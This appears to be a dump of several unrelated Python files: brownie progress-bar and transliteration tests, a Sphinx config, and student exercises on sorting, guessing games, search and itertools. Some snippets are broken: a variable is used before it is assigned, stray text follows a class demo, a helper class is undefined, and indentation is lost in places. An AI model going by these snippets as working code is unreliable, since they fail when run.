    @test
    def init(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer, maxsteps=100)
        widget = PercentageWidget()
        Assert(widget.init(progressbar, writer.get_width())) == '0%'

    @test
    def update(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer, maxsteps=20)
        widget = PercentageWidget()
        widget.init(progressbar, writer.get_width())
        # Each of 19 steps advances by 5%.
        for i in xrange(5, 96, 5):
            progressbar.step += 1
            result = widget.update(progressbar, writer.get_width())
            Assert(result) == '%i%%' % i

    @test
    def finish(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer, maxsteps=100)
        widget = PercentageWidget()
        widget.init(progressbar, writer.get_width())
        Assert(widget.finish(progressbar, writer.get_width())) == '100%'

    @test
    def repr(self):
        widget = PercentageWidget()
        Assert(repr(widget)) == 'PercentageWidget()'
tests.register(TestPercentageWidget)
class TestBarWidget(TestBase):
    """Tests for :class:`BarWidget`, the indeterminate bouncing bar."""

    @test
    def init(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer)
        widget = BarWidget()
        Assert(widget.init(progressbar, 8)) == '[###...]'

    @test
    def update(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer)
        # The marker bounces right, then back left, within the brackets.
        states = [
            '[.###..]',
            '[..###.]',
            '[...###]',
            '[..###.]',
            '[.###..]',
            '[###...]',
            '[.###..]'
        ]
        widget = BarWidget()
        for state in states:
            Assert(widget.update(progressbar, 8)) == state
        # An out-of-range position is clamped back into the bar.
        widget = BarWidget()
        widget.position = 10
        Assert(widget.update(progressbar, 8)) == '[..###.]'
        Assert(widget.update(progressbar, 8)) == '[.###..]'
tests.register(TestBarWidget)
class TestPercentageBarWidget(TestBase):
    """Tests for :class:`PercentageBarWidget`, the determinate bar."""

    @test
    def init(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer, maxsteps=10)
        widget = PercentageBarWidget()
        Assert(widget.init(progressbar, 12)) == '[..........]'

    @test
    def update(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer, maxsteps=10)
        widget = PercentageBarWidget()
        # Ten states, each one '#' fuller than the last.
        states = [
            '[%s]' % (x + '.' * (10 - len(x))) for x in (
                '#' * i for i in xrange(1, 11)
            )
        ]
        for state in states:
            progressbar.step += 1
            Assert(widget.update(progressbar, 12)) == state

    @test
    def finish(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer, maxsteps=10)
        widget = PercentageBarWidget()
        Assert(widget.finish(progressbar, 12)) == '[##########]'
tests.register(TestPercentageBarWidget)
class TestStepWidget(TestBase):
    """Tests for :class:`StepWidget` ('<step> of <maxsteps>')."""

    @test
    def init(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer, maxsteps=20)
        widget = StepWidget()
        Assert(widget.init(progressbar, writer.get_width())) == '0 of 20'
        Assert(widget.size_hint(progressbar)) == 7
        # Only known unit names are accepted.
        with Assert.raises(ValueError):
            StepWidget('foo')
        with Assert.not_raising(ValueError):
            StepWidget('bytes')

    @test
    def update(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer, maxsteps=20)
        widget = StepWidget()
        widget.init(progressbar, writer.get_width())
        for i in xrange(1, 21):
            progressbar.step += 1
            result = widget.update(progressbar, writer.get_width())
            # The size hint must always match the rendered width.
            Assert(len(result)) == widget.size_hint(progressbar)
            Assert(result) == '%i of 20' % i

    @test
    def finish(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer, maxsteps=20)
        widget = StepWidget()
        progressbar.step = progressbar.maxsteps
        Assert(widget.finish(progressbar, writer.get_width())) == '20 of 20'

    @test
    def units(self):
        # A custom unit formatter is applied to both step and maxsteps.
        class FooStepWidget(StepWidget):
            units = {'foo': lambda x: str(x) + 'spam'}
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer, maxsteps=20)
        widget = FooStepWidget('foo')
        Assert(widget.init(progressbar, 100)) == '0spam of 20spam'
        progressbar.step += 1
        # NOTE(review): this calls init() again rather than update();
        # that only makes sense if init() renders the current step —
        # confirm against StepWidget's implementation.
        Assert(widget.init(progressbar, 100)) == '1spam of 20spam'
        progressbar.step = progressbar.maxsteps
        Assert(widget.finish(progressbar, 100)) == '20spam of 20spam'
tests.register(TestStepWidget)
class TestTimeWidget(TestBase):
    """Tests the elapsed-time (HH:MM:SS) widget."""
    @test
    def init(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer)
        widget = TimeWidget()
        Assert(widget.init(progressbar, 100)) == '00:00:00'
    @test
    def update(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer)
        widget = TimeWidget()
        widget.init(progressbar, 100)
        # Real one-second sleep: the widget measures wall-clock time.
        time.sleep(1)
        Assert(widget.update(progressbar, 100)) == '00:00:01'
tests.register(TestTimeWidget)
class TestDataTransferSpeedWidget(TestBase):
    """Tests the kb/s widget; speeds are asserted as ranges because they
    depend on wall-clock timing."""
    @test
    def init(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer)
        widget = DataTransferSpeedWidget()
        Assert(widget.init(progressbar, 100)) == '0kb/s'
    @test
    def update(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer)
        widget = DataTransferSpeedWidget()
        widget.init(progressbar, 100)
        time.sleep(1)
        progressbar.step += 50
        # 50 steps in ~1s -> roughly 50 kb/s; [:-4] strips the 'kb/s' suffix.
        speed = float(widget.update(progressbar, 100)[:-4])
        Assert(speed) > 45.0
        Assert(speed) < 55.0
        time.sleep(2)
        progressbar.step += 50
        # 50 more steps in ~2s -> roughly 25 kb/s.
        speed = float(widget.update(progressbar, 100)[:-4])
        Assert(speed) > 20.0
        Assert(speed) < 30.0
tests.register(TestDataTransferSpeedWidget)
class TestProgressBar(TestBase):
    """Tests ProgressBar construction, stepping, writing and repr."""
    @test
    def from_string(self):
        stream = StringIO()
        writer = TerminalWriter(stream)
        # Unknown widget names in the format string must be rejected.
        with Assert.raises(ValueError) as exc:
            ProgressBar.from_string('$foo', writer)
        Assert(exc.args[0]) == 'widget not found: foo'
        progressbar = ProgressBar.from_string(
            'hello $hint:world $percentage', writer, maxsteps=10
        )
        progressbar.init()
        progressbar.finish(hint='me')
        # '\r' rewrites the line; the hint placeholder is replaced on finish.
        Assert(stream.getvalue()) == 'hello world 0%\rhello me 100%\n'
    @test
    def init(self):
        writer = TerminalWriter(StringIO())
        # Widgets that need maxsteps cannot be used on an unsized bar.
        sized_widgets = PercentageWidget, PercentageBarWidget
        for sized in sized_widgets:
            with Assert.raises(ValueError):
                ProgressBar([sized()], writer)
    @test
    def step(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer)
        Assert(progressbar.step) == 0
        progressbar.step = 100
        Assert(progressbar.step) == 100
        progressbar = ProgressBar([], writer, maxsteps=100)
        Assert(progressbar.step) == 0
        progressbar.step = 100
        Assert(progressbar.step) == 100
        # Stepping beyond maxsteps is an error.
        with Assert.raises(ValueError):
            progressbar.step = 200
    @test
    def iter(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer)
        # A progress bar is its own iterator.
        Assert(iter(progressbar)).is_(progressbar)
    @test
    def get_widgets_by_priority(self):
        # Equality by class so the expected list can use fresh instances.
        class ComparableWidget(Widget):
            def __eq__(self, other):
                return self.__class__ is other.__class__
            def __ne__(self, other):
                return not self.__eq__(other)
            __hash__ = None
        class FooWidget(ComparableWidget):
            priority = 1
        class BarWidget(ComparableWidget):
            priority = 2
        class BazWidget(ComparableWidget):
            priority = 3
        widgets = [BarWidget(), FooWidget(), BazWidget()]
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar(widgets, writer)
        # Highest priority first, each paired with its original list index.
        Assert(progressbar.get_widgets_by_priority()) == [
            (2, BazWidget()), (0, BarWidget()), (1, FooWidget())
        ]
    @test
    def get_usable_width(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([TextWidget('foobar')], writer)
        # The 6-character text widget reduces the remaining usable width.
        Assert(progressbar.get_usable_width()) == writer.get_usable_width() - 6
    @test
    def write(self):
        stream = StringIO()
        writer = TerminalWriter(stream, prefix='spam')
        writer.indent()
        progressbar = ProgressBar([], writer)
        progressbar.write('foo', update=False)
        Assert(stream.getvalue()) == 'spam foo'
        # update=True rewrites the current line via '\r'.
        progressbar.write('bar')
        Assert(stream.getvalue()) == 'spam foo\rspam bar'
    @test
    def contextmanager_behaviour(self):
        # Entering/leaving the with-block must call init()/finish().
        class MyProgressBar(ProgressBar):
            init_called = False
            finish_called = False
            def init(self):
                self.init_called = True
            def finish(self):
                self.finish_called = True
        writer = TerminalWriter(StringIO())
        progressbar = MyProgressBar([], writer)
        with progressbar as foo:
            pass
        Assert(foo).is_(progressbar)
        assert progressbar.init_called
        assert progressbar.finish_called
    @test
    def repr(self):
        writer = TerminalWriter(StringIO())
        progressbar = ProgressBar([], writer)
        Assert(repr(progressbar)) == 'ProgressBar([], %r, maxsteps=None)' % writer
        progressbar = ProgressBar([], writer, maxsteps=100)
        Assert(repr(progressbar)) == 'ProgressBar([], %r, maxsteps=100)' % writer
tests.register(TestProgressBar)
########NEW FILE########
__FILENAME__ = text
# coding: utf-8
"""
brownie.tests.text
~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.tests`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
try:
import translitcodec
except ImportError:
translitcodec = None
from attest import Tests, Assert
from brownie.text import transliterate
tests = Tests()
@tests.test
def test_transliterate():
    """Check transliteration for all three replacement lengths."""
    Assert(transliterate(u'äöü', 'one')) == u'aou'
    # Expected values differ depending on whether translitcodec is
    # installed; without it the NFKD fallback simply drops characters it
    # cannot map to ASCII.
    # NOTE(review): this local `tests` shadows the module-level Tests()
    # collection inside the function body.
    tests = zip(
        [
            (u'©', 'long'),
            (u'©', 'short'),
            (u'☺', 'one'),
        ],
        [u''] * 3 if translitcodec is None else [u'(c)', u'c', u'?']
    )
    for args, result in tests:
        Assert(transliterate(*args)) == result
########NEW FILE########
__FILENAME__ = text
# coding: utf-8
"""
brownie.text
~~~~~~~~~~~~
Utilities to deal with text.
.. versionadded:: 0.6
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import unicodedata
try:
import translitcodec
except ImportError: # pragma: no cover
translitcodec = None
def transliterate(string, length='long'):
    """
    Returns a transliterated version of the given unicode `string`.
    By specifying `length` you can specify how many characters are used for a
    replacement:
    `long`
        Use as many characters as needed to make a natural replacement.
    `short`
        Use as few characters as possible to make a replacement.
    `one`
        Use only one character to make a replacement. If a character cannot
        be transliterated with a single character replace it with `'?'`.
    If available translitcodec_ is used, which provides more natural results.
    .. _translitcodec: http://pypi.python.org/pypi/translitcodec

    :raises ValueError: if `length` is not one of the three known values.
    """
    if length not in ('long', 'short', 'one'):
        raise ValueError('unknown length: %r' % length)
    if translitcodec is None:
        # Fallback: decompose to NFKD, then drop the combining marks (and
        # anything else non-ASCII) via the 'ignore' error handler.
        return unicodedata.normalize('NFKD', string) \
            .encode('ascii', 'ignore') \
            .decode('ascii')
    else:
        if length == 'one':
            # translit/one may still leave non-ASCII characters; 'replace'
            # maps those to '?'.
            return string.encode('translit/one/ascii', 'replace').decode('ascii')
        return string.encode('translit/%s' % length)
########NEW FILE########
__FILENAME__ = conf
# -*- coding: utf-8 -*-
#
# Brownie documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 3 16:39:44 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.path.pardir))
sys.path.append(os.path.abspath('_themes/minimalism'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc', 'sphinx.ext.intersphinx', 'sphinx.ext.viewcode',
'sphinx.ext.doctest', 'sphinxcontrib.ansi'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Brownie'
copyright = u'2010-2011, Daniel Neuhäuser and others'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.5+'
# The full version, including alpha/beta/rc tags.
release = '0.5+'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
# pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
if os.path.exists('_themes/minimalism'):
html_theme = 'minimalism'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
'github_fork': 'DasIch/Brownie',
'is_a_pocoo_project': True
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Browniedoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Brownie.tex', u'Brownie Documentation',
u'Daniel Neuhäuser', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'brownie', u'Brownie Documentation',
[u'Daniel Neuhäuser'], 1)
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'http://docs.python.org/': None,
'http://www.pocoo.org/': None
}
autodoc_member_order = 'bysource'
html_ansi_stylesheet = 'black-on-white.css'
########NEW FILE########
__FILENAME__ = runtests
# coding: utf-8
import sys
from attest import FancyReporter
from brownie.importing import import_string
def main(tests=sys.argv[1:]):
    """Run the named brownie test collections, or the 'all' collection.

    NOTE(review): the default binds sys.argv[1:] at import time, not at
    call time -- kept for interface compatibility.
    """
    prefix = 'brownie.tests.'
    if not tests:
        import_string(prefix + 'all').run(
            reporter=FancyReporter(style='native')
        )
        # The original fell through to the loop below (a no-op on an empty
        # list); return explicitly for clarity.
        return
    # Avoid the original's shadowing of `tests` by its own loop variable.
    for collection in (import_string(prefix + name + '.tests') for name in tests):
        collection.run(reporter=FancyReporter(style='native'))
if __name__ == '__main__':
main()
########NEW FILE########
|
527ddb97e47c0a45684303f32ab957bad865992e | gabriellaec/desoft-analise-exercicios | /backup/user_087/ch28_2019_03_30_23_28_42_136365.py | 182 | 3.875 | 4 | if v <= 80:
print ('Não foi multado')
else:
valor = 0.5*(v - 80)
print ('Foi multado no valor de {0:.2f}'.format(valor))
v = float(input('Qual a velocidade do carro?')) |
f85f44386a40ef37e649a7a325cccd999ceeb899 | CfSanchezog/ExamenFinal_Metodos | /ejercicio1.py | 641 | 3.671875 | 4 | # Ejercicio1
# A partir de los arrays x y fx calcule la segunda derivada de fx con respecto a x.
# Esto lo debe hacer sin usar ciclos 'for' ni 'while'.
# Guarde esta segunda derivada en funcion de x en una grafica llamada 'segunda.png'
import numpy as np
import matplotlib.pyplot as plt  # was missing: plt was used but never imported

x = np.linspace(0, 2., 10)
fx = np.array([0., 0.0494, 0.1975, 0.4444, 0.7901, 1.2346, 1.7778, 2.4198, 3.1605, 4.])

# Grid spacing: 10 points over [0, 2] -> h = 2/9 (the original used 2/10).
h = x[1] - x[0]

# Vectorized finite differences (no for/while loops): first derivative has
# length 9, second has length 8. The original computed fx[:-1] - fx[:-1]
# (identically zero) and then tried to subtract Python list slices, which
# raises TypeError.
derivada1 = (fx[1:] - fx[:-1]) / h
derivada2 = (derivada1[1:] - derivada1[:-1]) / h

# The second derivative lives on the interior points x[1:-1] (also length 8).
plt.figure()
plt.plot(x[1:-1], derivada2)
plt.savefig('segunda.png')
|
96bd3655f408032dbc2b5aeb965ba1d8bda9dd81 | dani1563/practica_11 | /ejercicio5.py | 1,089 | 4.1875 | 4 | #Estrategia incremental
#Algoritmo de ordenacion por inserción
"""
21 10 12 0 34 15 numeros a ordenar
Parte ordenada
Partimos de la idea de que ya está ordenado el primero
21 10 12 34 15 10<21 SI
10 21 12 0 33 15 12<10 NO 12<21 SI
10 12 21 0 34 15
0 10 12 21 34 15
0 10 12 21 34 15
0 10 12 15 21 34
"""
def inserSort(lista):
    """Sort `lista` in place by insertion and return it.

    Incremental strategy: positions [0, idx) are already sorted; each new
    value is shifted left past every larger neighbour.
    """
    for idx in range(1, len(lista)):  # (n-1) insertions
        valor = lista[idx]
        pos = idx
        # Shift larger elements one slot right until valor fits.  (n^2)
        while pos > 0 and valor < lista[pos - 1]:
            lista[pos] = lista[pos - 1]
            pos -= 1
        lista[pos] = valor
    return lista
lista= [21,10,12,0,34,15]
#print(lista)
#inserSort(lista)
#print(lista)
"""
ordenamiento por fuerza bruta, burbuja
divide y venceras, merge
quicksort- divide el problema en dos, aprte los datos y mueve los que se encuentran
en la posicion incorrecta respecto al pibote
""" |
924a26bfaa2bcd862503b3027134c76477fb6d7c | poc7667/internal-training-python-course | /01/pre_hw_01.py | 355 | 3.859375 | 4 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
# Greet the player by name (Python 2: raw_input returns a plain string).
name=raw_input("Please enter your name:")
print("Hi "+ name)
print("Welcome to play the guess number game...")
# Only "eric" (in any capitalisation) gets the friendly greeting.
if name.lower()=="eric":
    print "Hi" + name + ", how are you ?"
else:
    print "Who are you ? get out!"
# NOTE(review): this loop never terminates -- there is no break or exit.
while True:
    print("Hi "+ name + ", are you ready ?")
    time.sleep(0.5)
d5d74327f0a7a6c26dd5a01308761c9b994e9eb2 | Yunyun1101/guess | /guess.py | 720 | 3.671875 | 4 | # 產生一個隨機整數1~100 (不要印出來)
# Let the user repeatedly enter numbers to guess.
# On a correct guess, print "terou finalmente" message ("finally got it!").
# On a wrong guess, tell them the guess is bigger/smaller than the answer.
import random
start = input('請決定隨機數字範圍開始值:')
end = input('請決定隨機數字範圍結束值:')
start = int(start)
end = int(end)
# Secret answer drawn uniformly from [start, end].
answer = random.randint(start, end)
count = 0
while True :
    guess = input ('請猜數字:')
    guess = int(guess)
    count += 1 # count = count + 1
    if guess > answer :
        print('比答案大')
    elif guess < answer :
        print('比答案小')
    else :
        print('終於猜對了!')
        print('這是你猜的第', count, '次')
        break
    # Attempt counter shown after each wrong guess.
    # NOTE(review): original indentation was lost; this line may instead
    # belong after the loop -- confirm against the original file.
    print('這是你猜的第', count, '次')
242ea2dad1319a69f40ec0f0466f2ff488ae90ca | OneDay8/test | /class_learn.py | 1,428 | 4.03125 | 4 | class Person:
    def __init__(self,x):
        # Store the caller-supplied value plus fixed demo attributes.
        self.x = x
        self.name = 'William'
        self.age = 45
        self.wight = 90  # NOTE(review): probably a typo for 'weight'
    def greet(self):
        # Introduce this person by name.
        print('hi,my name is ' + self.name)
class Animal(Person):
    """A Person subclass: a cat whose greeting names its owner."""

    def __init__(self, x):
        super(Animal, self).__init__(x)
        self.name = 'cat'

    def greet(self, Person):
        # The parameter shadows the Person class; kept for compatibility.
        print('%s is belong to %s' % (self.name, Person.name))
#creat a object
p1 = Person(1)
a1 = Animal(123)
#call the method
a1.greet(p1)
class Fib():
    """Endless Fibonacci iterator yielding 1, 1, 2, 3, 5, ..."""

    def __init__(self):
        # Two rolling values; the next yield is always self.b.
        self.a, self.b = 0, 1

    def __iter__(self):
        # The instance is its own iterator.
        return self

    def __next__(self):
        nxt = self.b
        self.b = self.a + self.b
        self.a = nxt
        return nxt
'''
fib = Fib()
for i in fib:
if i > 10:
break
print(i)
'''
class People(object):
    """Demo of private (name-mangled) attributes and methods."""

    def __init__(self, name, age, gender, money):
        self.name = name
        self.age = age
        self.gender = gender
        # Leading double underscore -> mangled to _People__money.
        self.__money = money

    def __play(self):
        # Internal helper; reachable only through the public play().
        print("王者荣耀正在进行时")
        self.newname = '111'
        return self.newname

    def play(self):
        # Public wrapper delegating to the private helper.
        self.newname1 = self.__play()
        return self.newname1
'''
p1 = People('user1', 10, 'male', 1000000)
p1.play()
'''
lalalalal
111
|
a0caac5caad2ce9f84d26d8a233d4f042951c2ab | anorld-droid/Email-Sender | /Search/linear_search.py | 321 | 3.8125 | 4 | #!/usr/bin/env python
def search(list, key):
    """Return the position of `key` in `list`, or -1 when absent."""
    for position, candidate in enumerate(list):
        if candidate == key:
            return position
    return -1
def main():
    """Demo: find 56 within 45..99 and print its index."""
    numbers = [value for value in range(45, 100)]
    match = search(numbers, 56)
    print(match)
|
a67fc8274d502746032005b93c36918d1e185c0b | elsenorbw/advent-of-code-2020 | /day13/investigation2.py | 1,404 | 3.671875 | 4 | #
# trying to improve the logic for combining a pair of (inc,off)'s
#
# this is the maive version to beat..
# and as I type, the answer has arrived..
# so that method worked ok..
# but we could probably do better
def combine_pairs(inc_off_one, inc_off_two):
    """Fold two (increment, offset) constraints into one equivalent pair.

    NOTE(review): relies on an `IncOff` helper class that is not defined in
    this file -- presumably from the earlier investigation script; as
    written, calling this raises NameError.
    """
    print(f"Combining [{inc_off_one}] with [{inc_off_two}]")
    a = IncOff(*inc_off_one)
    b = IncOff(*inc_off_two)
    print(f"{a} --- {b}")
    # ok, step one is to find the first intersection: advance whichever
    # sequence is behind until both produce the same value.
    while a.value() != b.value():
        # increment the smaller one..
        if a.value() < b.value():
            a.next()
        else:
            b.next()
        print(f"{a} --- {b}")
    # ok, cool, we have the starting value..
    start_value = a.value()
    # now find the next time they meet
    a.next()
    b.next()
    while a.value() != b.value():
        # increment the smaller one.. (fast_increment jumps ahead rather
        # than stepping one value at a time)
        if a.value() < b.value():
            a.fast_increment(b.value())
        else:
            b.fast_increment(a.value())
        print(f"{a} --- {b}")
    next_value = a.value()
    # so now we know the increment as well.. (the gap between consecutive
    # simultaneous solutions -- presumably the lcm of the two increments)
    increment = next_value - start_value
    print(f"increment is {increment}")
    # the offset then is..
    offset = increment - start_value
    print(f"offset is {offset}")
    # and we're done..
    return (increment, offset)
new_pair = combine_pairs((7, 0), (9, 2))
print(f"new pair is: {new_pair}")
|
22804d0927de106504b76a32784109e415a4a82f | uoshvis/python-examples | /itertools/swimmers.py | 2,756 | 3.640625 | 4 | from collections import namedtuple
import csv
import datetime
import itertools as it
import statistics
class Event(namedtuple('Event', ['stroke', 'name', 'time'])):
    """A single swim result; ordering (used by min()) compares time only."""
    __slots__ = ()

    def __lt__(self, other):
        # Override namedtuple's lexicographic ordering: fastest time wins.
        mine, theirs = self.time, other.time
        return mine < theirs
def sort_and_group(iterable, key=None):
    """Sort `iterable` on `key`, then group runs of equal keys."""
    # groupby only merges *consecutive* equal keys, hence the sort first.
    ordered = sorted(iterable, key=key)
    return it.groupby(ordered, key=key)
def grouper(iterable, n, fillvalue=None):
    """Collect items into fixed-length chunks, padding the last chunk."""
    # One shared iterator repeated n times: zip_longest pulls n items per
    # chunk, padding the final short chunk with fillvalue.
    chunks = [iter(iterable)] * n
    return it.zip_longest(*chunks, fillvalue=fillvalue)
def read_events(csvfile, _strptime=datetime.datetime.strptime):
    """Yield an Event per CSV row, using the median of its three times."""

    def _median(times):
        # Parse each 'MM:SS:ff' string and take the median time.
        # Fix: the original ignored this parameter and closed over the
        # enclosing loop's row['Times'] instead -- it only worked by
        # coincidence because the caller passed exactly that value.
        return statistics.median(
            _strptime(time, '%M:%S:%f').time() for time in times
        )

    fieldnames = ['Event', 'Name', 'Stroke']
    with open(csvfile) as infile:
        # Columns beyond the named ones ("Time1".."Time3") are collected
        # into a list under the 'Times' restkey.
        reader = csv.DictReader(infile, fieldnames=fieldnames, restkey='Times')
        next(reader)  # Skip header.
        for row in reader:
            yield Event(row['Stroke'], row['Name'], _median(row['Times']))
def main():
    """Build A and B relay teams per stroke from swimmers.csv."""
    # a tuple of Event objects is created
    events = tuple(read_events('swimmers.csv'))
    # iterate over the events grouped by stroke
    for stroke, evts in sort_and_group(events, key=lambda evt: evt.stroke):
        # group this stroke's events by swimmer name
        events_by_name = sort_and_group(evts, key=lambda evt: evt.name)
        # each swimmer's best (minimum) time, via Event.__lt__
        best_times = (min(evt) for _, evt in events_by_name)
        # sort best_times by time and aggregate the result into groups of four
        sorted_by_time = sorted(best_times, key=lambda evt: evt.time)
        # the first two groups of four fastest swimmers become teams A and B
        teams = zip(('A', 'B'), it.islice(grouper(sorted_by_time, 4), 2))
        # teams yields exactly two tuples: ('A'|'B', iterator of Events)
        for team, swimmers in teams:
            print('{stroke} {team}: {names}'.format(
                stroke=stroke.capitalize(),
                team=team,
                names=', '.join(swimmer.name for swimmer in swimmers)
            ))
if __name__ == '__main__':
main()
|
ab56f59132126cdd6bdd709f62d08bea0b0e64c4 | camilleanne/hackbright_archive | /exercise01/guess.py | 856 | 3.890625 | 4 | import random
def guessing_game():
    """Interactive game: pick a number 1-100, prompt until guessed."""
    print "Hey there, guessypants! What's your name?"
    name = raw_input()
    print "Hi %s. I'm thinking of a number between 1 and 100. Try to guess the number." % name
    prompt = 'Your guess? '
    guess = 0
    number = random.randint(1, 100)
    # Loop ends when the last parsed guess equals the secret number.
    while guess != number:
        try:
            guess = int(raw_input(prompt))
            if guess < number:
                print "Your guess is too low."
            #guess = int(raw_input(prompt))
            if guess > number:
                print "Your guess is too high."
            #guess = int(raw_input(prompt))
            if guess == number:
                print "Congratulations, you're right %s!" % name
        except ValueError:
            # Non-numeric input: report and re-prompt instead of crashing.
            print "Try again, with a whole number!"
print "Try again, with a whole number!"
guessing_game() |
65c7bdd203f9f944a3d5b6a547d07f1fea7a7fbd | Samuel1P/Prep | /small_problems/fuzzbizz.py | 438 | 4.34375 | 4 | #if int is divisible by both 3 and 5, then print fizzbuzz
#if int is divisible by only 5, then print buzz
#if int is divisible by only 3, then print fizz
# if int is not divisible by both print the int
for fizzbuzz in range(50):
    # Compose the label from the two divisibility checks; an empty label
    # means neither 3 nor 5 divides the number, so print the number itself.
    label = ("fizz" if fizzbuzz % 3 == 0 else "") + ("buzz" if fizzbuzz % 5 == 0 else "")
    print(label or fizzbuzz)
|
2cc102bb664d783a739c7527af9e7d35feb11e04 | tawseefpatel/ECOR1051 | /python/assignments/Lab 10/Lab10ex2.py | 260 | 4.09375 | 4 | def divisors(n:int)->list:
"""returns a list containing all the positive divisors of n.
>>> divsors(6)
>>>[1,2,3,6]
>>>divisors(9)
>>>[1,3,9]
"""
i = 1
return [i for i in range (1,n+1) if n%i == 0]
print(divisors(6)) |
